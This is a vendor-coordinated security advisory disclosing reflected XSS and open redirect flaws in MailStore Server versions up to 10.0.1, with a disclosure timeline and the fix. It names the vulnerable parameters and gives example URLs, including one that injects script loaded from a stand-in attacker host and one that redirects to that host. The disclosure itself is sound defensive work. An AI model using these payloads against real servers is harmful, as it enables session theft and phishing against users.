MailStore 10.0.1 Cross Site Scripting / Open Redirect

`secuvera-SA-2017-02: Reflected XSS and Open Redirect in MailStore Server  
  
Affected Products  
MailStore Server Version 10.0.1.12148 was tested  
according to the vendor:  
- MailStore 9.2 to 10.0.1 is affected by the Reflected XSS Vulnerability  
- Mailstore 9.0 to 10.0.1 is affected by the Open Redirect Vulnerability  
  
References  
https://www.secuvera.de/advisories/secuvera-SA-2017-02.txt  
CWE-79 https://cwe.mitre.org/data/definitions/79.html  
CWE-601 https://cwe.mitre.org/data/definitions/601.html  
  
Summary:  
"MailStore Server is one of the worldas leading solutions for email archiving,   
management and compliance for small and medium-sized businesses."  
  
The in-built Webapplication does not properly validate untrusted input in   
several variables. This leads to both Reflected Cross-Site-Scripting (XSS)   
and an Open Redirect.  
  
Effect:  
To exploit the reflected XSS, the victim has to be authenticated to the   
Mailstore Webapplication. By clicking on a link sent to a victim, an attacker   
could for example copy the victims Session-ID to his on data sink.  
  
Sending another link with a crafted URL, the attacker could redirect the   
victim to a malicious website, while the link itself points to the trusted   
Mailstore-Address. The victim is not required to be authenticated.  
  
Vulnerable Scripts Reflected XSS for authenticated users:  
/search-result/, Parameters c-f, c-q, c-from and c-to   
/message/ajax/send/, Parameter recipient  
  
Vulnerable Script Open Redirect:  
derefer/, Parameter url  
  
Example for reflected XSS:  
https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cimg%20src=x%20onerror=alert%280%29%3E  
#Load external JS-Code  
https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cscript%20SRC=//www.boeserangreifer.de/script.js%3E  
  
Example for Open Redirect:  
https://www.example.com:8462/a/10.0.1.12148/derefer/?url=http%3a%2f%2fwww.boeserangreifer.de  
  
Solution:  
Update to Version 10.0.2  
  
Disclosure Timeline:  
2017/01/09 vendor contacted  
2017/01/10 initial vendor response asking for technical details  
2017/01/10 provided vendor with the advisory including technical details  
2017/01/13 vendor provided informations about affected versions and mitigation  
2017/01/18 update published by vendor  
2017/01/31 public disclosure  
  
Credits:  
Tobias Glemser  
[email protected]  
secuvera GmbH  
https://www.secuvera.de  
  
Disclaimer:  
All information is provided without warranty. The intent is to  
provide information to secure infrastructure and/or systems, not  
to be able to attack or damage. Therefore secuvera shall  
not be liable for any direct or indirect damages that might be  
caused by using this information.  
  
  
`